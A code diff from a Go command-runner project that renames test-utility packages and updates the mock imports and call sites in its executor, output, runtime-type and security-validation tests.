+		cmd := executortestutil.CreateRuntimeCommand(echoCmd, []string{"test"}, executortestutil.WithName("test_no_audit"), executortestutil.WithWorkDir(""), executortestutil.WithRunAsUser("testuser"), executortestutil.WithRunAsGroup("testgroup"))
 
 		result, err := exec.Execute(context.Background(), cmd, map[string]string{}, nil)
 
@@ -568,14 +568,14 @@ func TestDefaultExecutor_ExecuteUserGroupPrivileges_AuditLogging(t *testing.T) {
 // TestDefaultExecutor_UserGroupPrivilegeElevationFailure tests privilege elevation failure scenarios
 // This replaces the deleted TestDefaultExecutor_PrivilegeElevationFailure test for user/group commands
 func TestDefaultExecutor_UserGroupPrivilegeElevationFailure(t *testing.T) {
-	mockPrivMgr := privilegetesting.NewFailingMockPrivilegeManager(true)
+	mockPrivMgr := privilegetestutil.NewFailingMockPrivilegeManager(true)
 
 	exec := executor.NewDefaultExecutor(
 		executor.WithPrivilegeManager(mockPrivMgr),
-		executor.WithFileSystem(&executortesting.MockFileSystem{}),
+		executor.WithFileSystem(&executortestutil.MockFileSystem{}),
 	)
 
-	cmd := executortesting.CreateRuntimeCommand(echoCmd, []string{"test"}, executortesting.WithWorkDir(""), executortesting.WithRunAsUser("root"), executortesting.WithRunAsGroup("wheel"))
+	cmd := executortestutil.CreateRuntimeCommand(echoCmd, []string{"test"}, executortestutil.WithWorkDir(""), executortestutil.WithRunAsUser("root"), executortestutil.WithRunAsGroup("wheel"))
 
 	ctx := context.Background()
 	envVars := map[string]string{"PATH": "/usr/bin"}
@@ -584,7 +584,7 @@ func TestDefaultExecutor_UserGroupPrivilegeElevationFailure(t *testing.T) {
 
 	assert.Error(t, err)
 	assert.Nil(t, result)
-	assert.ErrorIs(t, err, privilegetesting.ErrMockPrivilegeElevationFailed)
+	assert.ErrorIs(t, err, privilegetestutil.ErrMockPrivilegeElevationFailed)
 }
 
 // TestDefaultExecutor_UserGroupBackwardCompatibility tests backward compatibility with non-privileged commands
@@ -592,10 +592,10 @@ func TestDefaultExecutor_UserGroupPrivilegeElevationFailure(t *testing.T) {
 func TestDefaultExecutor_UserGroupBackwardCompatibility(t *testing.T) {
 	// Test that existing code without privilege manager still works for normal commands
 	exec := executor.NewDefaultExecutor(
-		executor.WithFileSystem(&executortesting.MockFileSystem{}),
+		executor.WithFileSystem(&executortestutil.MockFileSystem{}),
 	)
 
-	cmd := executortesting.CreateRuntimeCommand(echoCmd, []string{"normal"}, executortesting.WithWorkDir(""))
+	cmd := executortestutil.CreateRuntimeCommand(echoCmd, []string{"normal"}, executortestutil.WithWorkDir(""))
 
 	ctx := context.Background()
 	envVars := map[string]string{"PATH": "/usr/bin"}
@@ -621,12 +621,12 @@ func TestDefaultExecutor_UserGroupPrivileges_StderrCapture(t *testing.T) {
 	}{
 		{
 			name: "privileged command failure captures stderr",
-			cmd: executortesting.CreateRuntimeCommand(
+			cmd: executortestutil.CreateRuntimeCommand(
 				shCmd,
 				[]string{"-c", "echo 'error output' >&2; exit 255"},
-				executortesting.WithWorkDir(""),
-				executortesting.WithRunAsUser("testuser"),
-				executortesting.WithRunAsGroup("testgroup"),
+				executortestutil.WithWorkDir(""),
+				executortestutil.WithRunAsUser("testuser"),
+				executortestutil.WithRunAsGroup("testgroup"),
 			),
 			privileged:     true,
 			expectedStdout: "",
@@ -636,10 +636,10 @@ func TestDefaultExecutor_UserGroupPrivileges_StderrCapture(t *testing.T) {
 		},
 		{
 			name: "normal command failure captures stderr",
-			cmd: executortesting.CreateRuntimeCommand(
+			cmd: executortestutil.CreateRuntimeCommand(
 				shCmd,
 				[]string{"-c", "echo 'normal error' >&2; exit 1"},
-				executortesting.WithWorkDir(""),
+				executortestutil.WithWorkDir(""),
 			),
 			privileged:     false,
 			expectedStdout: "",
@@ -649,11 +649,11 @@ func TestDefaultExecutor_UserGroupPrivileges_StderrCapture(t *testing.T) {
 		},
 		{
 			name: "privileged command failure captures both stdout and stderr",
-			cmd: executortesting.CreateRuntimeCommand(
+			cmd: executortestutil.CreateRuntimeCommand(
 				shCmd,
 				[]string{"-c", "echo 'stdout message'; echo 'stderr message' >&2; exit 42"},
-				executortesting.WithWorkDir(""),
-				executortesting.WithRunAsUser("testuser"),
+				executortestutil.WithWorkDir(""),
+				executortestutil.WithRunAsUser("testuser"),
 			),
 			privileged:     true,
 			expectedStdout: "stdout message",
@@ -667,10 +667,10 @@ func TestDefaultExecutor_UserGroupPrivileges_StderrCapture(t *testing.T) {
 		t.Run(tc.name, func(t *testing.T) {
 			var opts []executor.Option
 			if tc.privileged {
-				mockPriv := privilegetesting.NewMockPrivilegeManager(true)
+				mockPriv := privilegetestutil.NewMockPrivilegeManager(true)
 				opts = append(opts, executor.WithPrivilegeManager(mockPriv))
 			}
-			opts = append(opts, executor.WithFileSystem(&executortesting.MockFileSystem{}))
+			opts = append(opts, executor.WithFileSystem(&executortestutil.MockFileSystem{}))
 			exec := executor.NewDefaultExecutor(opts...)
 
 			result, err := exec.Execute(context.Background(), tc.cmd, map[string]string{}, nil)
@@ -714,7 +714,7 @@ func TestDefaultExecutor_UserGroupRootExecution(t *testing.T) {
 	}{
 		{
 			name:               "root user command executes with elevation",
-			cmd:                executortesting.CreateRuntimeCommand(whoamiCmd, []string{}, executortesting.WithWorkDir(""), executortesting.WithRunAsUser("root")),
+			cmd:                executortestutil.CreateRuntimeCommand(whoamiCmd, []string{}, executortestutil.WithWorkDir(""), executortestutil.WithRunAsUser("root")),
 			privilegeSupported: true,
 			expectError:        false,
 			noPrivilegeManager: false,
@@ -722,7 +722,7 @@ func TestDefaultExecutor_UserGroupRootExecution(t *testing.T) {
 		},
 		{
 			name:               "root user command fails when not supported",
-			cmd:                executortesting.CreateRuntimeCommand(whoamiCmd, []string{}, executortesting.WithWorkDir(""), executortesting.WithRunAsUser("root")),
+			cmd:                executortestutil.CreateRuntimeCommand(whoamiCmd, []string{}, executortestutil.WithWorkDir(""), executortestutil.WithRunAsUser("root")),
 			privilegeSupported: false,
 			expectError:        true,
 			errorMessage:       "user/group privilege changes are not supported",
@@ -731,7 +731,7 @@ func TestDefaultExecutor_UserGroupRootExecution(t *testing.T) {
 		},
 		{
 			name:               "root user command fails with no manager",
-			cmd:                executortesting.CreateRuntimeCommand(whoamiCmd, []string{}, executortesting.WithWorkDir(""), executortesting.WithRunAsUser("root")),
+			cmd:                executortestutil.CreateRuntimeCommand(whoamiCmd, []string{}, executortestutil.WithWorkDir(""), executortestutil.WithRunAsUser("root")),
 			privilegeSupported: true,
 			expectError:        true,
 			errorMessage:       "no privilege manager available",
@@ -740,7 +740,7 @@ func TestDefaultExecutor_UserGroupRootExecution(t *testing.T) {
 		},
 		{
 			name:               "normal command bypasses privilege manager",
-			cmd:                executortesting.CreateRuntimeCommand(echoCmd, []string{"test"}, executortesting.WithWorkDir("")),
+			cmd:                executortestutil.CreateRuntimeCommand(echoCmd, []string{"test"}, executortestutil.WithWorkDir("")),
 			privilegeSupported: false, // Should not matter
 			expectError:        false,
 			noPrivilegeManager: false,
@@ -750,18 +750,18 @@ func TestDefaultExecutor_UserGroupRootExecution(t *testing.T) {
 
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
-			mockPrivMgr := privilegetesting.NewMockPrivilegeManager(tt.privilegeSupported)
+			mockPrivMgr := privilegetestutil.NewMockPrivilegeManager(tt.privilegeSupported)
 
 			var exec executor.CommandExecutor
 			if tt.noPrivilegeManager {
 				// Create executor without privilege manager
 				exec = executor.NewDefaultExecutor(
-					executor.WithFileSystem(&executortesting.MockFileSystem{}),
+					executor.WithFileSystem(&executortestutil.MockFileSystem{}),
 				)
 			} else {
 				exec = executor.NewDefaultExecutor(
 					executor.WithPrivilegeManager(mockPrivMgr),
-					executor.WithFileSystem(&executortesting.MockFileSystem{}),
+					executor.WithFileSystem(&executortestutil.MockFileSystem{}),
 				)
 			}
 

--- a/internal/runner/base/executor/testutil/helpers.go
+++ b/internal/runner/base/executor/testutil/helpers.go
@@ -1,6 +1,6 @@
 //go:build test || performance
 
-package testutil
+package executortestutil
 
 import (
 	"os"

--- a/internal/runner/base/executor/testutil/mocks.go
+++ b/internal/runner/base/executor/testutil/mocks.go
@@ -1,6 +1,6 @@
 //go:build test || performance
 
-package testutil
+package executortestutil
 
 import (
 	"os"

--- a/internal/runner/base/executor/testutil/testify_mocks.go
+++ b/internal/runner/base/executor/testutil/testify_mocks.go
@@ -1,7 +1,7 @@
 //go:build test || performance
 
-// Package testutil provides testify-based mock implementations for executor interfaces.
-package testutil
+// Package executortestutil provides testify-based mock implementations for executor interfaces.
+package executortestutil
 
 import (
 	"context"

--- a/internal/runner/base/output/file_test.go
+++ b/internal/runner/base/output/file_test.go
@@ -7,8 +7,8 @@ import (
 	"path/filepath"
 	"testing"
 
-	commontesting "github.com/isseis/go-safe-cmd-runner/internal/common/testutil"
-	safefileiotesting "github.com/isseis/go-safe-cmd-runner/internal/safefileio/testutil"
+	"github.com/isseis/go-safe-cmd-runner/internal/common/testutil"
+	"github.com/isseis/go-safe-cmd-runner/internal/safefileio/testutil"
 	tu "github.com/isseis/go-safe-cmd-runner/internal/testutil"
 	"github.com/stretchr/testify/assert"
 	"github.com/stretchr/testify/require"
@@ -522,7 +522,7 @@ func TestSafeFileManager_MoveToFinal_WithMock(t *testing.T) {
 		tempPath             string
 		finalPath            string
 		perm                 os.FileMode
-		setupMock            func(*commontesting.MockFileSystem)
+		setupMock            func(*commontestutil.MockFileSystem)
 		atomicMoveError      error
 		wantErr              bool
 		errContains          string
@@ -533,7 +533,7 @@ func TestSafeFileManager_MoveToFinal_WithMock(t *testing.T) {
 			tempPath:  "/tmp/test.tmp",
 			finalPath: "/output/final.txt",
 			perm:      0o600,
-			setupMock: func(mock *commontesting.MockFileSystem) {
+			setupMock: func(mock *commontestutil.MockFileSystem) {
 				// Pre-add directory so EnsureDirectory succeeds
 				require.NoError(t, mock.AddDir("/output", 0o750))
 			},
@@ -546,7 +546,7 @@ func TestSafeFileManager_MoveToFinal_WithMock(t *testing.T) {
 			tempPath:  "/tmp/test.tmp",
 			finalPath: "/output/final.txt",
 			perm:      0o600,
-			setupMock: func(mock *commontesting.MockFileSystem) {
+			setupMock: func(mock *commontestutil.MockFileSystem) {
 				// Pre-add directory so EnsureDirectory succeeds
 				require.NoError(t, mock.AddDir("/output", 0o750))
 			},
@@ -560,7 +560,7 @@ func TestSafeFileManager_MoveToFinal_WithMock(t *testing.T) {
 			tempPath:  "/tmp/test.tmp",
 			finalPath: "/existing_file/final.txt",
 			perm:      0o600,
-			setupMock: func(mock *commontesting.MockFileSystem) {
+			setupMock: func(mock *commontestutil.MockFileSystem) {
 				// Add a file at the path where we expect a directory
 				require.NoError(t, mock.AddFile("/existing_file", 0o644, []byte("content")))
 			},
@@ -573,13 +573,13 @@ func TestSafeFileManager_MoveToFinal_WithMock(t *testing.T) {
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
 			// Set up mock safefileio.FileSystem
-			mockSafeFS := safefileiotesting.NewMockFileSystem()
+			mockSafeFS := safefileiotestutil.NewMockFileSystem()
 			mockSafeFS.AtomicMoveFileFunc = func(_, _ string, _ os.FileMode) error {
 				return tt.atomicMoveError
 			}
 
 			// Set up mock common.FileSystem
-			mockCommonFS := commontesting.NewMockFileSystem()
+			mockCommonFS := commontestutil.NewMockFileSystem()
 			if tt.setupMock != nil {
 				tt.setupMock(mockCommonFS)
 			}
@@ -621,14 +621,14 @@ func TestSafeFileManager_EnsureDirectory_WithMock(t *testing.T) {
 	tests := []struct {
 		name        string
 		path        string
-		setupMock   func(*commontesting.MockFileSystem)
+		setupMock   func(*commontestutil.MockFileSystem)
 		wantErr     bool
 		errContains string
 	}{
 		{
 			name: "directory_already_exists",
 			path: "/existing/dir",
-			setupMock: func(mock *commontesting.MockFileSystem) {
+			setupMock: func(mock *commontestutil.MockFileSystem) {
 				require.NoError(t, mock.AddDir("/existing/dir", 0o755))
 			},
 			wantErr: false,
@@ -636,7 +636,7 @@ func TestSafeFileManager_EnsureDirectory_WithMock(t *testing.T) {
 		{
 			name: "create_new_directory",
 			path: "/new/dir",
-			setupMock: func(_ *commontesting.MockFileSystem) {
+			setupMock: func(_ *commontestutil.MockFileSystem) {
 				// Directory doesn't exist, MkdirAll should be called
 			},
 			wantErr: false,
@@ -644,7 +644,7 @@ func TestSafeFileManager_EnsureDirectory_WithMock(t *testing.T) {
 		{
 			name: "path_is_file_not_directory",
 			path: "/path/to/file",
-			setupMock: func(mock *commontesting.MockFileSystem) {
+			setupMock: func(mock *commontestutil.MockFileSystem) {
 				require.NoError(t, mock.AddFile("/path/to/file", 0o644, []byte("content")))
 			},
 			wantErr:     true,
@@ -655,13 +655,13 @@ func TestSafeFileManager_EnsureDirectory_WithMock(t *testing.T) {
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
 			// Set up mock common.FileSystem
-			mockCommonFS := commontesting.NewMockFileSystem()
+			mockCommonFS := commontestutil.NewMockFileSystem()
 			if tt.setupMock != nil {
 				tt.setupMock(mockCommonFS)
 			}
 
 			// Set up mock safefileio.FileSystem (not used in EnsureDirectory)
-			mockSafeFS := safefileiotesting.NewMockFileSystem()
+			mockSafeFS := safefileiotestutil.NewMockFileSystem()
 
 			// Create SafeFileManager with mocks
 			manager := &SafeFileManager{safeFS: mockSafeFS, commonFS: mockCommonFS}
@@ -686,14 +686,14 @@ func TestSafeFileManager_RemoveTemp_WithMock(t *testing.T) {
 	tests := []struct {
 		name        string
 		path        string
-		setupMock   func(*commontesting.MockFileSystem)
+		setupMock   func(*commontestutil.MockFileSystem)
 		wantErr     bool
 		errContains string
 	}{
 		{
 			name: "file_exists_and_removed",
 			path: "/tmp/test.tmp",
-			setupMock: func(mock *commontesting.MockFileSystem) {
+			setupMock: func(mock *commontestutil.MockFileSystem) {
 				require.NoError(t, mock.AddFile("/tmp/test.tmp", 0o600, []byte("content")))
 			},
 			wantErr: false,
@@ -701,7 +701,7 @@ func TestSafeFileManager_RemoveTemp_WithMock(t *testing.T) {
 		{
 			name: "file_does_not_exist_idempotent",
 			path: "/tmp/nonexistent.tmp",
-			setupMock: func(_ *commontesting.MockFileSystem) {
+			setupMock: func(_ *commontestutil.MockFileSystem) {
 				// File doesn't exist
 			},
 			wantErr: false, // RemoveTemp should be idempotent
@@ -709,7 +709,7 @@ func TestSafeFileManager_RemoveTemp_WithMock(t *testing.T) {
 		{
 			name: "path_is_directory_error",
 			path: "/tmp/dir",
-			setupMock: func(mock *commontesting.MockFileSystem) {
+			setupMock: func(mock *commontestutil.MockFileSystem) {
 				require.NoError(t, mock.AddDir("/tmp/dir", 0o755))
 			},
 			wantErr:     true,
@@ -720,13 +720,13 @@ func TestSafeFileManager_RemoveTemp_WithMock(t *testing.T) {
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
 			// Set up mock common.FileSystem
-			mockCommonFS := commontesting.NewMockFileSystem()
+			mockCommonFS := commontestutil.NewMockFileSystem()
 			if tt.setupMock != nil {
 				tt.setupMock(mockCommonFS)
 			}
 
 			// Set up mock safefileio.FileSystem (not used in RemoveTemp)
-			mockSafeFS := safefileiotesting.NewMockFileSystem()
+			mockSafeFS := safefileiotestutil.NewMockFileSystem()
 
 			// Create SafeFileManager with mocks
 			manager := &SafeFileManager{safeFS: mockSafeFS, commonFS: mockCommonFS}
@@ -752,7 +752,7 @@ func TestSafeFileManager_CreateTempFile_WithMock(t *testing.T) {
 		name        string
 		dir         string
 		pattern     string
-		setupMock   func(*commontesting.MockFileSystem)
+		setupMock   func(*commontestutil.MockFileSystem)
 		wantErr     bool
 		errContains string
 	}{
@@ -760,7 +760,7 @@ func TestSafeFileManager_CreateTempFile_WithMock(t *testing.T) {
 			name:    "create_temp_file_in_default_dir",
 			dir:     "",
 			pattern: "test_*.tmp",
-			setupMock: func(_ *commontesting.MockFileSystem) {
+			setupMock: func(_ *commontestutil.MockFileSystem) {
 				// MockFileSystem.CreateTemp handles temp file creation
 			},
 			wantErr: false,
@@ -769,7 +769,7 @@ func TestSafeFileManager_CreateTempFile_WithMock(t *testing.T) {
 			name:    "create_temp_file_in_specific_dir",
 			dir:     "/custom/dir",
 			pattern: "output_*.tmp",
-			setupMock: func(mock *commontesting.MockFileSystem) {
+			setupMock: func(mock *commontestutil.MockFileSystem) {
 				require.NoError(t, mock.AddDir("/custom/dir", 0o755))
 			},
 			wantErr: false,
@@ -779,13 +779,13 @@ func TestSafeFileManager_CreateTempFile_WithMock(t *testing.T) {
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
 			// Set up mock common.FileSystem
-			mockCommonFS := commontesting.NewMockFileSystem()
+			mockCommonFS := commontestutil.NewMockFileSystem()
 			if tt.setupMock != nil {
 				tt.setupMock(mockCommonFS)
 			}
 
 			// Set up mock safefileio.FileSystem (not used in CreateTempFile)
-			mockSafeFS := safefileiotesting.NewMockFileSystem()
+			mockSafeFS := safefileiotestutil.NewMockFileSystem()
 
 			// Create SafeFileManager with mocks
 			manager := &SafeFileManager{safeFS: mockSafeFS, commonFS: mockCommonFS}

--- a/internal/runner/base/output/manager_test.go
+++ b/internal/runner/base/output/manager_test.go
@@ -11,10 +11,10 @@ import (
 	"github.com/stretchr/testify/mock"
 	"github.com/stretchr/testify/require"
 
-	commontesting "github.com/isseis/go-safe-cmd-runner/internal/common/testutil"
+	"github.com/isseis/go-safe-cmd-runner/internal/common/testutil"
 	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/runnertypes"
 	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/security"
-	safefileiotesting "github.com/isseis/go-safe-cmd-runner/internal/safefileio/testutil"
+	"github.com/isseis/go-safe-cmd-runner/internal/safefileio/testutil"
 	tu "github.com/isseis/go-safe-cmd-runner/internal/testutil"
 )
 
@@ -440,8 +440,8 @@ func TestDefaultOutputCaptureManager_FinalizeOutput(t *testing.T) {
 
 func TestDefaultOutputCaptureManager_CleanupOutput(t *testing.T) {
 	// Setup mocks
-	mockSafeFS := safefileiotesting.NewMockFileSystem()
-	mockCommonFS := commontesting.NewMockFileSystem()
+	mockSafeFS := safefileiotestutil.NewMockFileSystem()
+	mockCommonFS := commontestutil.NewMockFileSystem()
 
 	// Add a dummy file to mock FS
 	tempPath := "/tmp/test_output_123.tmp"

--- a/internal/runner/base/privilege/testutil/mocks.go
+++ b/internal/runner/base/privilege/testutil/mocks.go
@@ -1,7 +1,7 @@
 //go:build test
 
-// Package testutil provides shared test utilities for privilege management.
-package testutil
+// Package privilegetestutil provides shared test utilities for privilege management.
+package privilegetestutil
 
 import (
 	"context"

--- a/internal/runner/base/runnertypes/runtime_test.go
+++ b/internal/runner/base/runnertypes/runtime_test.go
@@ -4,7 +4,7 @@ import (
 	"testing"
 
 	"github.com/isseis/go-safe-cmd-runner/internal/common"
-	commontesting "github.com/isseis/go-safe-cmd-runner/internal/common/testutil"
+	"github.com/isseis/go-safe-cmd-runner/internal/common/testutil"
 	tu "github.com/isseis/go-safe-cmd-runner/internal/testutil"
 	"github.com/stretchr/testify/assert"
 	"github.com/stretchr/testify/require"
@@ -356,7 +356,7 @@ func TestRuntimeCommand_HelperMethods(t *testing.T) {
 		Timeout: tu.Int32Ptr(60),
 	}
 
-	runtime, err := NewRuntimeCommand(spec, common.NewUnsetTimeout(), commontesting.NewUnsetOutputSizeLimit(), "test-group")
+	runtime, err := NewRuntimeCommand(spec, common.NewUnsetTimeout(), commontestutil.NewUnsetOutputSizeLimit(), "test-group")
 	require.NoError(t, err)
 
 	// Test Cmd()

--- a/internal/runner/base/runnertypes/timeout_test.go
+++ b/internal/runner/base/runnertypes/timeout_test.go
@@ -4,7 +4,7 @@ import (
 	"testing"
 
 	"github.com/isseis/go-safe-cmd-runner/internal/common"
-	commontesting "github.com/isseis/go-safe-cmd-runner/internal/common/testutil"
+	"github.com/isseis/go-safe-cmd-runner/internal/common/testutil"
 	tu "github.com/isseis/go-safe-cmd-runner/internal/testutil"
 	"github.com/stretchr/testify/assert"
 )
@@ -57,7 +57,7 @@ func TestNewRuntimeCommand_TimeoutResolution(t *testing.T) {
 				Timeout: tt.commandTimeout,
 			}
 
-			runtime, err := NewRuntimeCommand(spec, common.NewFromIntPtr(tt.globalTimeout), commontesting.NewUnsetOutputSizeLimit(), "test-group")
+			runtime, err := NewRuntimeCommand(spec, common.NewFromIntPtr(tt.globalTimeout), commontestutil.NewUnsetOutputSizeLimit(), "test-group")
 			assert.NoError(t, err, "NewRuntimeCommand() should not fail")
 
 			assert.Equal(t, tt.expectedEffective, runtime.EffectiveTimeout,
@@ -86,7 +86,7 @@ func TestNewRuntimeCommand_CommandTimeoutZero(t *testing.T) {
 
 	globalTimeout := tu.Int32Ptr(60) // 60 seconds global timeout
 
-	runtime, err := NewRuntimeCommand(spec, common.NewFromIntPtr(globalTimeout), commontesting.NewUnsetOutputSizeLimit(), "test-group")
+	runtime, err := NewRuntimeCommand(spec, common.NewFromIntPtr(globalTimeout), commontestutil.NewUnsetOutputSizeLimit(), "test-group")
 	assert.NoError(t, err, "NewRuntimeCommand() should not fail")
 
 	// Command timeout should take precedence, resulting in unlimited execution
@@ -110,7 +110,7 @@ func TestNewRuntimeCommand_GlobalTimeoutZero(t *testing.T) {
 
 	globalTimeout := tu.Int32Ptr(0) // Unlimited global timeout
 
-	runtime, err := NewRuntimeCommand(spec, common.NewFromIntPtr(globalTimeout), commontesting.NewUnsetOutputSizeLimit(), "test-group")
+	runtime, err := NewRuntimeCommand(spec, common.NewFromIntPtr(globalTimeout), commontestutil.NewUnsetOutputSizeLimit(), "test-group")
 	assert.NoError(t, err, "NewRuntimeCommand() should not fail")
 
 	// Should inherit unlimited execution from global timeout
@@ -124,7 +124,7 @@ func TestNewRuntimeCommand_GlobalTimeoutZero(t *testing.T) {
 
 func TestNewRuntimeCommand_ErrorHandling(t *testing.T) {
 	// Test with nil spec
-	runtime, err := NewRuntimeCommand(nil, common.NewFromIntPtr(tu.Int32Ptr(60)), commontesting.NewUnsetOutputSizeLimit(), "test-group")
+	runtime, err := NewRuntimeCommand(nil, common.NewFromIntPtr(tu.Int32Ptr(60)), commontestutil.NewUnsetOutputSizeLimit(), "test-group")
 	assert.ErrorIs(t, err, ErrNilSpec, "NewRuntimeCommand(nil, ...) should return ErrNilSpec")
 	assert.Nil(t, runtime, "NewRuntimeCommand(nil, ...) should return nil runtime")
 }
@@ -179,7 +179,7 @@ func TestNewRuntimeCommand_TimeoutResolutionContext(t *testing.T) {
 			runtime, err := NewRuntimeCommand(
 				spec,
 				common.NewFromIntPtr(tt.globalTimeout),
-				commontesting.NewUnsetOutputSizeLimit(),
+				commontestutil.NewUnsetOutputSizeLimit(),
 				tt.groupName,
 			)
 

--- a/internal/runner/base/security/file_validation_test.go
+++ b/internal/runner/base/security/file_validation_test.go
@@ -11,7 +11,7 @@ import (
 	"github.com/stretchr/testify/assert"
 	"github.com/stretchr/testify/require"
 
-	commontesting "github.com/isseis/go-safe-cmd-runner/internal/common/testutil"
+	"github.com/isseis/go-safe-cmd-runner/internal/common/testutil"
 	"github.com/isseis/go-safe-cmd-runner/internal/groupmembership"
 	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/runnertypes"
 	isec "github.com/isseis/go-safe-cmd-runner/internal/security"
@@ -840,14 +840,14 @@ func TestValidator_ValidateDirectoryPermissions_CompletePath(t *testing.T) {
 
 	tests := []struct {
 		name        string
-		setupFunc   func(*commontesting.MockFileSystem)
+		setupFunc   func(*commontestutil.MockFileSystem)
 		dirPath     string
 		shouldFail  bool
 		expectedErr error
 	}{
 		{
 			name: "valid directory with secure path",
-			setupFunc: func(fs *commontesting.MockFileSystem) {
+			setupFunc: func(fs *commontestutil.MockFileSystem) {
 				// Create secure directory hierarchy
 				fs.AddDir("/usr", 0o755)
 				fs.AddDir("/usr/local", 0o755)
@@ -860,7 +860,7 @@ func TestValidator_ValidateDirectoryPermissions_CompletePath(t *testing.T) {
 		},
 		{
 			name: "directory with world-writable intermediate directory",
-			setupFunc: func(fs *commontesting.MockFileSystem) {
+			setupFunc: func(fs *commontestutil.MockFileSystem) {
 				fs.AddDir("/usr", 0o755)
 				fs.AddDir("/usr/local", 0o777) // World writable - insecure!
 				fs.AddDir("/usr/local/etc", 0o755)
@@ -873,7 +873,7 @@ func TestValidator_ValidateDirectoryPermissions_CompletePath(t *testing.T) {
 		},
 		{
 			name: "directory with group-writable intermediate directory owned by non-root",
-			setupFunc: func(fs *commontesting.MockFileSystem) {
+			setupFunc: func(fs *commontestutil.MockFileSystem) {
 				fs.AddDir("/opt", 0o755)
 				fs.AddDirWithOwner("/opt/myapp", 0o775, 1000, 1000) // Group writable, owned by non-root
 				fs.AddDir("/opt/myapp/etc", 0o755)
@@ -886,7 +886,7 @@ func TestValidator_ValidateDirectoryPermissions_CompletePath(t *testing.T) {
 		},
 		{
 			name: "directory with root group write owned by root",
-			setupFunc: func(fs *commontesting.MockFileSystem) {
+			setupFunc: func(fs *commontestutil.MockFileSystem) {
 				fs.AddDirWithOwner("/usr", 0o775, 0, 0) // Root group writable, owned by root - allowed
 				fs.AddDir("/usr/local", 0o755)
 				fs.AddDir("/usr/local/etc", 0o755)
@@ -898,7 +898,7 @@ func TestValidator_ValidateDirectoryPermissions_CompletePath(t *testing.T) {
 		},
 		{
 			name: "directory with non-root group write owned by root",
-			setupFunc: func(fs *commontesting.MockFileSystem) {
+			setupFunc: func(fs *commontestutil.MockFileSystem) {
 				fs.AddDirWithOwner("/usr", 0o775, 0, 1) // Non-root group writable, owned by root - prohibited
 				fs.AddDir("/usr/local", 0o755)
 				fs.AddDir("/usr/local/etc", 0o755)
@@ -911,7 +911,7 @@ func TestValidator_ValidateDirectoryPermissions_CompletePath(t *testing.T) {
 		},
 		{
 			name: "directory owned by current user",
-			setupFunc: func(fs *commontesting.MockFileSystem) {
+			setupFunc: func(fs *commontestutil.MockFileSystem) {
 				fs.AddDir("/home", 0o755)
 				fs.AddDirWithOwner("/home/user", 0o755, uint32(os.Getuid()), uint32(os.Getgid())) // Owned by current user
 				fs.AddDir("/home/user/config", 0o755)
@@ -921,7 +921,7 @@ func TestValidator_ValidateDirectoryPermissions_CompletePath(t *testing.T) {
 		},
 		{
 			name: "directory owned by different non-root user",
-			setupFunc: func(fs *commontesting.MockFileSystem) {
+			setupFunc: func(fs *commontestutil.MockFileSystem) {
 				fs.AddDir("/home", 0o755)
 				fs.AddDirWithOwner("/home/user", 0o755, 2000, 2000) // Owned by different non-root user (UID 2000)
 				fs.AddDir("/home/user/config", 0o755)
@@ -944,7 +944,7 @@ func TestValidator_ValidateDirectoryPermissions_CompletePath(t *testing.T) {
 		},
 		{
 			name: "root directory with insecure permissions",
-			setupFunc: func(fs *commontesting.MockFileSystem) {
+			setupFunc: func(fs *commontestutil.MockFileSystem) {
 				// Replace default secure root with insecure one
 				fs.RemoveAll("/")
 				fs.AddDirWithOwner("/", 0o777, 0, 0) // World-writable root - insecure!
@@ -957,7 +957,7 @@ func TestValidator_ValidateDirectoryPermissions_CompletePath(t *testing.T) {
 		},
 		{
 			name: "directory hierarchy with sticky bit directory",
-			setupFunc: func(fs *commontesting.MockFileSystem) {
+			setupFunc: func(fs *commontestutil.MockFileSystem) {
 				// Create hierarchy with sticky bit directory (like /tmp)
 				fs.AddDirWithOwner("/tmp", 0o777|os.ModeSticky, 0, 0) // World-writable with sticky bit - safe!
 				fs.AddDir("/tmp/user-temp", 0o755)
@@ -968,7 +968,7 @@ func TestValidator_ValidateDirectoryPermissions_CompletePath(t *testing.T) {
 		},
 		{
 			name: "directory hierarchy with world-writable directory without sticky bit",
-			setupFunc: func(fs *commontesting.MockFileSystem) {
+			setupFunc: func(fs *commontestutil.MockFileSystem) {
 				// Create hierarchy with world-writable directory but no sticky bit - insecure!
 				fs.AddDirWithOwner("/shared", 0o777, 0, 0) // World-writable without sticky bit - insecure!
 				fs.AddDir("/shared/data", 0o755)
@@ -982,7 +982,7 @@ func TestValidator_ValidateDirectoryPermissions_CompletePath(t *testing.T) {
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
 			// Create fresh mock filesystem for each test
-			testMockFS := commontesting.NewMockFileSystem()
+			testMockFS := commontestutil.NewMockFileSystem()
 			testValidator, err := NewValidator(config, WithFileSystem(testMockFS))
 			require.NoError(t, err)
 
@@ -1010,14 +1010,14 @@ func TestValidator_ValidateCompletePath_SymlinkProtection(t *testing.T) {
 
 	tests := []struct {
 		name        string
-		setupFunc   func(*commontesting.MockFileSystem)
+		setupFunc   func(*commontestutil.MockFileSystem)
 		path        string
 		shouldFail  bool
 		expectedErr error
 	}{
 		{
 			name: "path with symlink component should be rejected",
-			setupFunc: func(fs *commontesting.MockFileSystem) {
+			setupFunc: func(fs *commontestutil.MockFileSystem) {
 				// Create secure directory hierarchy, but skip /usr/local as we'll replace it with a symlink
 				fs.AddDir("/usr", 0o755)
 
@@ -1035,7 +1035,7 @@ func TestValidator_ValidateCompletePath_SymlinkProtection(t *testing.T) {
 		},
 		{
 			name: "path with symlink target directory should be rejected",
-			setupFunc: func(fs *commontesting.MockFileSystem) {
+			setupFunc: func(fs *commontestutil.MockFileSystem) {
 				// Create secure directory hierarchy
 				fs.AddDir("/usr", 0o755)
 				fs.AddDir("/usr/local", 0o755)
@@ -1055,7 +1055,7 @@ func TestValidator_ValidateCompletePath_SymlinkProtection(t *testing.T) {
 		},
 		{
 			name: "secure path with no symlinks should pass",
-			setupFunc: func(fs *commontesting.MockFileSystem) {
+			setupFunc: func(fs *commontestutil.MockFileSystem) {
 				// Create completely normal directory hierarchy
 				fs.AddDir("/usr", 0o755)
 				fs.AddDir("/usr/local", 0o755)
